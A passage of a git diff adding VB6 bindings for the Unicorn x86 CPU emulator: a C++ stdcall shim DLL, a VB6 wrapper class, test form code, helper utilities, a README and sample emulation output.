List1.AddItem "Failed to unmap alloc " & uc.errMsg + End If + + List1.AddItem "Mem allocs count now: " & uc.getMemMap().count + +End Sub + +Private Sub Command1_Click() + Clipboard.Clear + Clipboard.SetText lbCopy(List1) +End Sub + +Private Sub Form_Unload(Cancel As Integer) + 'so IDE doesnt hang onto dll and we can recompile in development testing.. if you hit stop this benefit is lost.. + 'do not use this in your real code, only for c dll development.. + If uc.hLib <> 0 Then FreeLibrary uc.hLib +End Sub + +Private Sub uc_CodeHook(ByVal address As Long, ByVal size As Long) + + List1.AddItem "> " & uc.disasm(address) + + If hContext = 0 And address = &H1000003 Then 'change the PC to "inc EDX" + List1.AddItem "changing eip to skip last inc ecx's and saving context..." + hContext = uc.saveContext() + If hContext = 0 Then List1.AddItem "Failed to save context " & uc.errMsg + uc.eip = &H1000006 + End If + +End Sub + +Private Sub uc_Interrupt(ByVal intno As Long) + List1.AddItem "Interrupt: " & intno +End Sub + +Private Sub uc_InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long, continue As Boolean) + 'continue defaults to false so we can ignore it unless we want to continue.. + List1.AddItem "Invalid mem access address: " & Hex(address) & " size: " & Hex(size) & " type: " & memType2str(t) +End Sub + +Private Sub uc_MemAccess(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long) + List1.AddItem "mem access: address: " & Hex(address) & " size: " & Hex(size) & " type: " & memType2str(t) +End Sub + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Project1.vbp b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Project1.vbp new file mode 100644 index 0000000..31ab39f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Project1.vbp @@ -0,0 +1,42 @@ +Type=Exe +Form=Form1.frm +Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation +Module=uc_def; uc_def.bas +Module=misc; misc.bas +Class=ucIntel32; ucIntel32.cls +Class=CMemRegion; CMemRegion.cls +IconForm="Form1" +Startup="Form1" +HelpFile="" +ExeName32="vb6Test.exe" +Command32="" +Name="Project1" +HelpContextID="0" +CompatibleMode="0" +MajorVer=1 +MinorVer=0 +RevisionVer=0 +AutoIncrementVer=0 +ServerSupportFiles=0 +VersionCompanyName="sandsprite" +CompilationType=0 +OptimizationType=0 +FavorPentiumPro(tm)=0 +CodeViewDebugInfo=-1 +NoAliasing=0 +BoundsCheck=0 +OverflowCheck=0 +FlPointCheck=0 +FDIVCheck=0 +UnroundedFP=0 +StartMode=0 +Unattended=0 +Retained=0 +ThreadPerObject=0 +MaxNumberOfThreads=1 + +[MS Transaction Server] +AutoRefresh=1 + +[fastBuild] +fullPath=%ap%\vb6Test.exe diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/README.txt b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/README.txt new file mode 100644 index 0000000..bb607d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/README.txt @@ -0,0 +1,71 @@ + +Unicorn engine bindings for VB6 + +A sample class for the 32bit x86 emulator is provided. + +Contributed by: FireEye FLARE team +Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> +License: Apache + +' supported api: +' ucs_version +' ucs_arch_supported +' ucs_open +' ucs_close +' uc_reg_write +' uc_reg_read +' uc_mem_write +' UC_MEM_READ +' uc_emu_start +' uc_emu_stop +' ucs_hook_add +' uc_mem_map +' uc_hook_del +' uc_mem_regions +' uc_mem_map_ptr +' uc_context_alloc +' uc_free +' uc_context_save +' uc_context_restore +' uc_mem_unmap +' uc_mem_protect +' uc_strerror +' uc_errno +' +' supported hooks: +' UC_HOOK_CODE +' UC_HOOK_BLOCK +' memory READ/WRITE/FETCH +' invalid memory access +' interrupts +' +' bonus: +' disasm_addr (conditional compile - uses libdasm) +' mem_write_block (map and write data auto handles alignment) +' get_memMap (wrapper for uc_mem_regions) +' + +dependancies: (all in same directory or unicorn package in %windir%) + vb6Test.exe + ucvbshim.dll _ + unicorn.dll - + libgcc_s_dw2-1.dll \ + libiconv-2.dll \__ unicorn package + libintl-8.dll / + libpcre-1.dll / + libwinpthread-1.dll_- + +Notes: + + c dll was built using VS2008 + build notes are included at the top of main.c + this dll serves as a stdcall shim so vb6 can access the cdecl api and receive data from the callbacks. + + huge thanks to the unicorn and qemu authors who took on a gigantic task to create this library! + + + + + + + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/example_output.txt b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/example_output.txt new file mode 100644 index 0000000..c57c426 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/example_output.txt @@ -0,0 +1,54 @@ +ucvbshim.dll loaded @10000000 +Unicorn version: 1.0 +Disassembler available: True +Unicorn x86 32bit engine handle: 853FD8 +starts at: 01000000 41 inc ecx +readMem: 4141414141414242CC890DAAAAAAAA414A +start values ECX = 3 EDX = 15 +beginning emulation.. +> 01000000 41 inc ecx +> 01000001 41 inc ecx +> 01000002 41 inc ecx +> 01000003 41 inc ecx +changing eip to skip last inc ecx's and saving context... +> 01000006 42 inc edx +> 01000007 42 inc edx +> 01000008 CC int3 +Interrupt: 3 +> 01000009 89 0D AA AA AA AA mov [0xaaaaaaaa],ecx +Invalid mem access address: AAAAAAAA size: 4 type: Unmapped memory is written to +Quit emulation due to WRITE on unmapped memory: uc_emu_start() +ECX: 6 =? 6 +EDX: 17 =? 17 +EFL 4 P +Initilizing sharedMemory with: aabbccddeeff0011223344556677889900 +Wrote 0x41 to sharedMemory + 1 +readByte = 41 +emu read of sharedMemory: AA41CCDDEEFF0011223344556677889900000000 +sanity checking host mem: AA41CCDDEEFF0011223344556677889900000000 +Enumerating memory regions... +Addr: 1000000 Size: 200000 Perm: All (7) +Addr: 2000 Size: 1000 Perm: Read Write (3) +Addr: 4000 Size: 1000 Perm: All (7) +trying to restore context.. +eax=0 ecx=6 edx=F ebx=0 esp=0 ebp=0 esi=0 edi=0 eip=1000003 eflags=0 EFL 0 +beginning emulation.. +> 01000003 41 inc ecx +> 01000004 41 inc ecx +> 01000005 41 inc ecx +> 01000006 42 inc edx +> 01000007 42 inc edx +> 01000008 CC int3 +Interrupt: 3 +> 01000009 89 0D AA AA AA AA mov [0xaaaaaaaa],ecx +Invalid mem access address: AAAAAAAA size: 4 type: Unmapped memory is written to +Quit emulation due to WRITE on unmapped memory: uc_emu_start() +eax=0 ecx=9 edx=11 ebx=0 esp=0 ebp=0 esi=0 edi=0 eip=1000009 eflags=4 EFL 4 P +releasing saved context.. +Changed permissions on second alloc to ALL +redumping memory regions to check... +Addr: 1000000 Size: 200000 Perm: All (7) +Addr: 2000 Size: 1000 Perm: All (7) +Addr: 4000 Size: 1000 Perm: All (7) +Successfully unmapped new alloc +Mem allocs count now: 2 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/main.cpp b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/main.cpp new file mode 100644 index 0000000..725136f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/main.cpp @@ -0,0 +1,459 @@ + +/* + stdcall unicorn engine shim layer for use with VB6 or C# + code ripped from unicorn_dynload.c + + Contributed by: FireEye FLARE team + Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> + License: Apache + + Disassembler support can be optionally compiled in using: + libdasm (c) 2004 - 2006 jt / nologin.org + + this project has been built with vs2008 + + precompiled binaries with disasm support available here: + https://github.com/dzzie/libs/tree/master/unicorn_emu + +*/ + +#include <io.h> +#include <windows.h> + +#ifdef _WIN64 +#error vb6 is 32bit only +#endif + +#include <unicorn/unicorn.h> +#pragma comment(lib, "unicorn.lib") + +//if you compile with VS2008 you will need to add stdint.h and inttypes.h to your compiler include directory +//you can find examples here: https://github.com/dzzie/VS_LIBEMU/tree/master/libemu/include + +//if you want to include disassembler support: +// 1) install libdasm in your compilers include directory +// 2) add libdasm.h/.c to the project (drag and drop into VS project explorer), +// 3) remove the comment from the define below. +//The vb code detects the changes at runtime. +//#define INCLUDE_DISASM + +#ifdef INCLUDE_DISASM +#include <libdasm/libdasm.h> +#endif + + +#include "msvbvm60.tlh" //so we can use the vb6 collection object + +#define EXPORT comment(linker, "/EXPORT:"__FUNCTION__"="__FUNCDNAME__) + + +enum hookCatagory{hc_code = 0, hc_block = 1, hc_inst = 2, hc_int = 3, hc_mem = 4, hc_memInvalid = 5}; + +//tracing UC_HOOK_CODE & UC_HOOK_BLOCK +typedef void (__stdcall *vb_cb_hookcode_t) (uc_engine *uc, uint64_t address, uint32_t size, void *user_data); +vb_cb_hookcode_t vbHookcode = 0; +vb_cb_hookcode_t vbHookBlock = 0; + +//hooking memory UC_MEM_READ/WRITE/FETCH +typedef void (__stdcall *vb_cb_hookmem_t) (uc_engine *uc, uc_mem_type type, uint64_t address, int size,int64_t value, void *user_data); +vb_cb_hookmem_t vbHookMem = 0; + +//invalid memory access UC_MEM_*_UNMAPPED and UC_MEM_*PROT events +typedef bool (__stdcall *vb_cb_eventmem_t) (uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); +vb_cb_eventmem_t vbInvalidMem = 0; + +//tracing interrupts for uc_hook_intr() +typedef void (__stdcall *vb_cb_hookintr_t) (uc_engine *uc, uint32_t intno, void *user_data); +vb_cb_hookintr_t vbHookInt = 0; + +/* +typedef uint32_t (__stdcall *uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); tracing IN instruction of X86 +typedef void (__stdcall *uc_cb_insn_out_t) (uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); tracing OUT instruction of X86 +*/ + +//------------------ [ call back proxies ] ------------------------- +static void c_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + if(vbHookcode==0) return; + vbHookcode(uc,address,size,user_data); +} + +static void c_hook_mem(uc_engine *uc, uc_mem_type type,uint64_t address, int size, int64_t value, void *user_data) +{ + if(vbHookMem==0) return; + vbHookMem(uc,type,address,size,value,user_data); +} + +static bool c_hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) +{ + if(vbInvalidMem==0) return false; + return vbInvalidMem(uc,type,address,size,value,user_data); +} + + +static void c_hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + if(vbHookBlock==0) return; + vbHookBlock(uc,address,size,user_data); +} + +static void c_hook_intr(uc_engine *uc, uint32_t intno, void *user_data) +{ + if(vbHookInt==0) return; + vbHookInt(uc,intno,user_data); +} + + +/* +static uint32_t hook_in(uc_engine *uc, uint32_t port, int size, void *user_data) +{ +} + +static void hook_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) +{ +} +*/ + +//------------------------------------------------------------- + +//uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...); +//we need to use a C stub cdecl callback then proxy to the stdcall vb one.. +//we could get cute with an asm thunk in vb but not worth complexity there are only a couple of them to support.. +//cdecl callback to vb stdcall callback for tracing +uc_err __stdcall ucs_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, int catagory, int instr_id){ +#pragma EXPORT + + if(catagory == hc_code){ + if(vbHookcode == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbHookcode = (vb_cb_hookcode_t)callback; + } + return uc_hook_add(uc,hh,type,c_hook_code,user_data,begin,end); + } + + if(catagory == hc_block){ + if(vbHookBlock == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbHookBlock = (vb_cb_hookcode_t)callback; + } + return uc_hook_add(uc,hh,type,c_hook_block,user_data,begin,end); + } + + if(catagory == hc_mem){ //then it is some combination of memory access hook flags.. + if(vbHookMem == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbHookMem = (vb_cb_hookmem_t)callback; + } + return uc_hook_add(uc,hh,type,c_hook_mem,user_data,begin,end); + } + + if(catagory == hc_memInvalid){ //then it is some combination of invalid memory access hook flags.. + if(vbInvalidMem == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbInvalidMem = (vb_cb_eventmem_t)callback; + } + return uc_hook_add(uc,hh,type,c_hook_mem_invalid,user_data,begin,end); + } + + if(catagory == hc_int){ + if(vbHookInt == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbHookInt = (vb_cb_hookintr_t)callback; + } + return uc_hook_add(uc,hh,UC_HOOK_INTR,c_hook_intr,user_data,begin,end); + } + + return UC_ERR_ARG; +} + +unsigned int __stdcall ucs_dynload(char *path){ +#pragma EXPORT + /*#ifdef DYNLOAD + return uc_dyn_load(path, 0); + #else*/ + return 1; + //#endif +} + +unsigned int __stdcall ucs_version(unsigned int *major, unsigned int *minor){ +#pragma EXPORT + return uc_version(major, minor); +} + +bool __stdcall ucs_arch_supported(uc_arch arch){ +#pragma EXPORT + return uc_arch_supported(arch); +} + +uc_err __stdcall ucs_open(uc_arch arch, uc_mode mode, uc_engine **uc){ +#pragma EXPORT + return uc_open(arch, mode, uc); +} + +uc_err __stdcall ucs_close(uc_engine *uc){ +#pragma EXPORT + return uc_close(uc); +} + +uc_err __stdcall ucs_query(uc_engine *uc, uc_query_type type, size_t *result){ +#pragma EXPORT + return uc_query(uc, type, result); +} + +uc_err __stdcall ucs_errno(uc_engine *uc){ +#pragma EXPORT + return uc_errno(uc); +} + +const char *__stdcall ucs_strerror(uc_err code){ +#pragma EXPORT + return uc_strerror(code); +} + +uc_err __stdcall ucs_reg_write(uc_engine *uc, int regid, const void *value){ +#pragma EXPORT + return uc_reg_write(uc, regid, value); +} + +uc_err __stdcall ucs_reg_read(uc_engine *uc, int regid, void *value){ +#pragma EXPORT + return uc_reg_read(uc, regid, value); +} + +uc_err __stdcall ucs_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count){ +#pragma EXPORT + return uc_reg_write_batch(uc, regs, vals, count); +} + +uc_err __stdcall ucs_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count){ +#pragma EXPORT + return uc_reg_read_batch(uc, regs, vals, count); +} + +uc_err __stdcall ucs_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size){ +#pragma EXPORT + return uc_mem_write(uc, address, bytes, size); +} + +uc_err __stdcall ucs_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size){ +#pragma EXPORT + return uc_mem_read(uc, address, bytes, size); +} + +uc_err __stdcall ucs_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count){ +#pragma EXPORT + return uc_emu_start(uc, begin, until, timeout, count); +} + +uc_err __stdcall ucs_emu_stop(uc_engine *uc){ +#pragma EXPORT + return uc_emu_stop(uc); +} + +uc_err __stdcall ucs_hook_del(uc_engine *uc, uc_hook hh){ +#pragma EXPORT + return uc_hook_del(uc, hh); +} + +uc_err __stdcall ucs_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms){ +#pragma EXPORT + return uc_mem_map(uc, address, size, perms); +} + +//requires link against v1.0 +uc_err __stdcall ucs_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr){ +#pragma EXPORT + return uc_mem_map_ptr(uc, address, size, perms, ptr); +} + + +uc_err __stdcall ucs_mem_unmap(uc_engine *uc, uint64_t address, size_t size){ +#pragma EXPORT + return uc_mem_unmap(uc, address, size); +} + +uc_err __stdcall ucs_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms){ +#pragma EXPORT + return uc_mem_protect(uc, address, size, perms); +} + +uc_err __stdcall ucs_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count){ +#pragma EXPORT + return uc_mem_regions(uc, regions, count); +} + +uc_err __stdcall ucs_context_alloc(uc_engine *uc, uc_context **context){ +#pragma EXPORT + return uc_context_alloc(uc, context); +} + +uc_err __stdcall ucs_free(void *mem){ +#pragma EXPORT + return uc_free(mem); +} + +uc_err __stdcall ucs_context_save(uc_engine *uc, uc_context *context){ +#pragma EXPORT + return uc_context_save(uc, context); +} + +uc_err __stdcall ucs_context_restore(uc_engine *uc, uc_context *context){ +#pragma EXPORT + return uc_context_restore(uc, context); +} + +/* +char* asprintf(char* format, ...){ + + char *ret = 0; + + if(!format) return 0; + + va_list args; + va_start(args,format); + int size = _vscprintf(format, args); + + if(size > 0){ + size++; //for null + ret = (char*)malloc(size+2); + if(ret) _vsnprintf(ret, size, format, args); + } + + va_end(args); + return ret; +}*/ + +#ifdef INCLUDE_DISASM +int __stdcall disasm_addr(uc_engine *uc, uint32_t va, char *str, int bufLen){ +#pragma EXPORT + uint32_t instr_len = 0; + int readLen = 15; + uint8_t data[32]; + INSTRUCTION inst; + + if(bufLen < 100) return -1; + + //longest x86 instruction is 15 bytes, what if at the tail end of an allocation? try to read as much as we can.. + while(uc_mem_read(uc,va,data,readLen) != 0){ + readLen--; + if(readLen == 0) return -2; + } + + instr_len = get_instruction(&inst, data, MODE_32); + if( instr_len == 0 ) return -3; + + get_instruction_string(&inst, FORMAT_INTEL, va, str, bufLen); + + /* + if(inst.type == INSTRUCTION_TYPE_JMP || inst.type == INSTRUCTION_TYPE_JMPC){ + if(inst.op1.type == OPERAND_TYPE_IMMEDIATE){ + if(strlen(str) + 6 < bufLen){ + if(getJmpTarget(str) < va){ + strcat(str," ^^"); + }else{ + strcat(str," vv"); + } + } + } + }*/ + + return instr_len; +} +#endif + + +//maps and write in one shot, auto handles alignment.. +uc_err __stdcall mem_write_block(uc_engine *uc, uint64_t address, void* data, uint32_t size, uint32_t perm){ +#pragma EXPORT + + uc_err x; + uint64_t base = address; + uint32_t sz = size; + + while(base % 0x1000 !=0){ + base--; + if(base==0) break; + } + + sz += address-base; //if data starts mid block, we need to alloc more than just size.. + while(sz % 0x1000 !=0){ + sz++; + } + + x = uc_mem_map(uc, base, sz, perm); + if(x) return x; + + x = uc_mem_write(uc, address, (void*)data, size); + if(x) return x; + return UC_ERR_OK; +} + +void addStr(_CollectionPtr p , char* str){ + _variant_t vv; + vv.SetString(str); + p->Add( &vv.GetVARIANT() ); +} + +uc_err __stdcall get_memMap(uc_engine *uc, _CollectionPtr *pColl){ +#pragma EXPORT + + uc_mem_region *regions; + uint32_t count; + char tmp[200]; //max 46 chars used + + uc_err err = uc_mem_regions(uc, ®ions, &count); + + if (err != UC_ERR_OK) return err; + + for (uint32_t i = 0; i < count; i++) { + sprintf(tmp,"&h%llx,&h%llx,&h%x", regions[i].begin, regions[i].end, regions[i].perms); + addStr(*pColl,tmp); + } + + //free(regions); //https://github.com/unicorn-engine/unicorn/pull/373#issuecomment-271187118 + + uc_free((void*)regions); + return err; + +} + +enum op{ + op_add = 0, + op_sub = 1, + op_div = 2, + op_mul = 3, + op_mod = 4, + op_xor = 5, + op_and = 6, + op_or = 7, + op_rsh = 8, + op_lsh = 9, + op_gt = 10, + op_lt = 11, + op_gteq = 12, + op_lteq = 13 +}; + +unsigned int __stdcall ULong(unsigned int v1, unsigned int v2, int operation){ +#pragma EXPORT + + switch(operation){ + case op_add: return v1 + v2; + case op_sub: return v1 - v2; + case op_div: return v1 / v2; + case op_mul: return v1 * v2; + case op_mod: return v1 % v2; + case op_xor: return v1 ^ v2; + case op_and: return v1 & v2; + case op_or: return v1 | v2; + case op_rsh: return v1 >> v2; + case op_lsh: return v1 << v2; + case op_gt: return (v1 > v2 ? 1 : 0); + case op_lt: return (v1 < v2 ? 1 : 0); + case op_gteq: return (v1 >= v2 ? 1 : 0); + case op_lteq: return (v1 <= v2 ? 1 : 0); + } + + return -1; + +} \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/misc.bas b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/misc.bas new file mode 100644 index 0000000..255d9e8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/misc.bas @@ -0,0 +1,325 @@ +Attribute VB_Name = "misc" +Option Explicit + +Public sharedMemory() As Byte 'in a module so it never goes out of scope and becomes unallocated.. + +Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long +Public Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long +Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) +Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long +Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long + +Enum op + op_add = 0 + op_sub = 1 + op_div = 2 + op_mul = 3 + op_mod = 4 + op_xor = 5 + op_and = 6 + op_or = 7 + op_rsh = 8 + op_lsh = 9 + op_gt = 10 + op_lt = 11 + op_gteq = 12 + op_lteq = 13 +End Enum + +'unsigned math operations +Public Declare Function ULong Lib "ucvbshim.dll" (ByVal v1 As Long, ByVal v2 As Long, ByVal operation As op) As Long + +'this is just a quick way to support x64 numbers in vb6 its lite but can be bulky to work with +'if we wanted to really work with x64 values we would compile a library such as the following into the shim layer: +' https://github.com/dzzie/libs/tree/master/vb6_utypes + +Private Type Bit64Currency + value As Currency +End Type + +Private Type Bit64Integer + LowValue As Long + HighValue As Long +End Type + +Global Const LANG_US = &H409 + +Function lng2Cur(v As Long) As Currency + Dim c As Bit64Currency + Dim dl As Bit64Integer + dl.LowValue = v + dl.HighValue = 0 + LSet c = dl + lng2Cur = c.value +End Function + +Function cur2lng(v As Currency) As Long + Dim c As Bit64Currency + Dim dl As Bit64Integer + c.value = v + LSet dl = c + cur2lng = dl.LowValue +End Function + +Function KeyExistsInCollection(c As Collection, val As String) As Boolean + On Error GoTo nope + Dim t + t = c(val) + KeyExistsInCollection = True + Exit Function +nope: KeyExistsInCollection = False +End Function + +Function FileExists(path As String) As Boolean + On Error GoTo nope + + If Len(path) = 0 Then Exit Function + If Right(path, 1) = "\" Then Exit Function + If Dir(path, vbHidden Or vbNormal Or vbReadOnly Or vbSystem) <> "" Then FileExists = True + + Exit Function +nope: FileExists = False +End Function + +Function FileNameFromPath(fullpath) As String + Dim tmp + If InStr(fullpath, "\") > 0 Then + tmp = Split(fullpath, "\") + FileNameFromPath = CStr(tmp(UBound(tmp))) + End If +End Function + +Function GetParentFolder(path) As String + Dim tmp, a As Long + + If Right(path, 1) = "\" Then + GetParentFolder = path + Else + a = InStrRev(path, "\") + If a > 0 Then + GetParentFolder = Mid(path, 1, a) + End If + End If + +End Function + +Function FolderExists(ByVal path As String) As Boolean + On Error GoTo nope + If Len(path) = 0 Then Exit Function + If Right(path, 1) <> "\" Then path = path & "\" + If Dir(path, vbDirectory) <> "" Then FolderExists = True + Exit Function +nope: FolderExists = False +End Function + +Function HexDump(bAryOrStrData, Optional hexOnly = 0, Optional ByVal startAt As Long = 1, Optional ByVal Length As Long = -1) As String + Dim s() As String, chars As String, tmp As String + On Error Resume Next + Dim ary() As Byte + Dim offset As Long + Const LANG_US = &H409 + Dim i As Long, tt, h, x + + offset = 0 + + If TypeName(bAryOrStrData) = "Byte()" Then + ary() = bAryOrStrData + Else + ary = StrConv(CStr(bAryOrStrData), vbFromUnicode, LANG_US) + End If + + If startAt < 1 Then startAt = 1 + If Length < 1 Then Length = -1 + + While startAt Mod 16 <> 0 + startAt = startAt - 1 + Wend + + startAt = startAt + 1 + + chars = " " + For i = startAt To UBound(ary) + 1 + tt = Hex(ary(i - 1)) + If Len(tt) = 1 Then tt = "0" & tt + tmp = tmp & tt & " " + x = ary(i - 1) + 'chars = chars & IIf((x > 32 And x < 127) Or x > 191, Chr(x), ".") 'x > 191 causes \x0 problems on non us systems... asc(chr(x)) = 0 + chars = chars & IIf((x > 32 And x < 127), Chr(x), ".") + If i > 1 And i Mod 16 = 0 Then + h = Hex(offset) + While Len(h) < 6: h = "0" & h: Wend + If hexOnly = 0 Then + push s, h & " " & tmp & chars + Else + push s, tmp + End If + offset = offset + 16 + tmp = Empty + chars = " " + End If + If Length <> -1 Then + Length = Length - 1 + If Length = 0 Then Exit For + End If + Next + + 'if read length was not mod 16=0 then + 'we have part of line to account for + If tmp <> Empty Then + If hexOnly = 0 Then + h = Hex(offset) + While Len(h) < 6: h = "0" & h: Wend + h = h & " " & tmp + While Len(h) <= 56: h = h & " ": Wend + push s, h & chars + Else + push s, tmp + End If + End If + + HexDump = Join(s, vbCrLf) + + If hexOnly <> 0 Then + HexDump = Replace(HexDump, " ", "") + HexDump = Replace(HexDump, vbCrLf, "") + End If + +End Function + + +Public Function toBytes(ByVal hexstr, Optional strRet As Boolean = False) + +'supports: +'11 22 33 44 spaced hex chars +'11223344 run together hex strings +'11,22,33,44 csv hex +'\x11,0x22 misc C source rips +' +'ignores common C source prefixes, operators, delimiters, and whitespace +' +'not supported +'1,2,3,4 all hex chars are must have two chars even if delimited +' +'a version which supports more formats is here: +' https://github.com/dzzie/libs/blob/master/dzrt/globals.cls + + Dim ret As String, x As String, str As String + Dim r() As Byte, b As Byte, b1 As Byte + Dim foundDecimal As Boolean, tmp, i, a, a2 + Dim pos As Long, marker As String + + On Error GoTo nope + + str = Replace(hexstr, vbCr, Empty) + str = Replace(str, vbLf, Empty) + str = Replace(str, vbTab, Empty) + str = Replace(str, Chr(0), Empty) + str = Replace(str, "{", Empty) + str = Replace(str, "}", Empty) + str = Replace(str, ";", Empty) + str = Replace(str, "+", Empty) + str = Replace(str, """""", Empty) + str = Replace(str, "'", Empty) + str = Replace(str, " ", Empty) + str = Replace(str, "0x", Empty) + str = Replace(str, "\x", Empty) + str = Replace(str, ",", Empty) + + For i = 1 To Len(str) Step 2 + x = Mid(str, i, 2) + If Not isHexChar(x, b) Then Exit Function + bpush r(), b + Next + + If strRet Then + toBytes = StrConv(r, vbUnicode, LANG_US) + Else + toBytes = r + End If + +nope: +End Function + +Private Sub bpush(bAry() As Byte, b As Byte) 'this modifies parent ary object + On Error GoTo init + Dim x As Long + + x = UBound(bAry) '<-throws Error If Not initalized + ReDim Preserve bAry(UBound(bAry) + 1) + bAry(UBound(bAry)) = b + + Exit Sub + +init: + ReDim bAry(0) + bAry(0) = b + +End Sub + +Sub push(ary, value) 'this modifies parent ary object + On Error GoTo init + Dim x + + x = UBound(ary) + ReDim Preserve ary(x + 1) + + If IsObject(value) Then + Set ary(x + 1) = value + Else + ary(x + 1) = value + End If + + Exit Sub +init: + ReDim ary(0) + If IsObject(value) Then + Set ary(0) = value + Else + ary(0) = value + End If +End Sub + + +Public Function isHexChar(hexValue As String, Optional b As Byte) As Boolean + On Error Resume Next + Dim v As Long + + If Len(hexValue) = 0 Then GoTo nope + If Len(hexValue) > 2 Then GoTo nope 'expecting hex char code like FF or 90 + + v = CLng("&h" & hexValue) + If Err.Number <> 0 Then GoTo nope 'invalid hex code + + b = CByte(v) + If Err.Number <> 0 Then GoTo nope 'shouldnt happen.. > 255 cant be with len() <=2 ? + + isHexChar = True + + Exit Function +nope: + Err.Clear + isHexChar = False +End Function + +Function hhex(b As Byte) As String + hhex = Hex(b) + If Len(hhex) = 1 Then hhex = "0" & hhex +End Function + +Function rpad(x, i, Optional c = " ") + rpad = Left(x & String(i, c), i) +End Function + +Function lbCopy(lstBox As Object) As String + + Dim i As Long + Dim tmp() As String + + For i = 0 To lstBox.ListCount + push tmp, lstBox.List(i) + Next + + lbCopy = Join(tmp, vbCrLf) + +End Function + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/screenshot.png b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/screenshot.png new file mode 100644 index 0000000..fa1cf81 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/screenshot.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucIntel32.cls b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucIntel32.cls new file mode 100644 index 0000000..b54186f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucIntel32.cls @@ -0,0 +1,927 @@ +VERSION 1.0 CLASS +BEGIN + MultiUse = -1 'True + Persistable = 0 'NotPersistable + DataBindingBehavior = 0 'vbNone + DataSourceBehavior = 0 'vbNone + MTSTransactionMode = 0 'NotAnMTSObject +END +Attribute VB_Name = "ucIntel32" +Attribute VB_GlobalNameSpace = False +Attribute VB_Creatable = True +Attribute VB_PredeclaredId = False +Attribute VB_Exposed = False +Option Explicit + +'Unicorn Engine x86 32bit wrapper class for vb6 + +'Contributed by: FireEye FLARE team +'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> +'License: Apache + +'we hide the extra labor of x64 conversion from the user. I could simplify +'this at the C shim layer but I might write an x64 class later +' +'since the vb long type only natively supports signed math, I have also handed off a couple +'calculations in this class to a C stub just to be safe. +' +'you can find a full unsigned and x64 safe library for vb6 here: +' https://github.com/dzzie/libs/tree/master/vb6_utypes + +Public hLib As Long +Public uc As Long +Public errMsg As String +Public Version As String +Public major As Long +Public minor As Long + +Private r32 As Variant +Private r16 As Variant +Private r8 As Variant +Private rs_ As Variant +Private rs_Name As Variant +Private r32_Name As Variant +Private r16_Name As Variant +Private r8_Name As Variant +Private hooks As New Collection +Private m_DisasmOk As Boolean + +Event CodeHook(ByVal address As Long, ByVal size As Long) +Event BlockHook(ByVal address As Long, ByVal size As Long) +Event MemAccess(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long) +Event InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long, ByRef continue As 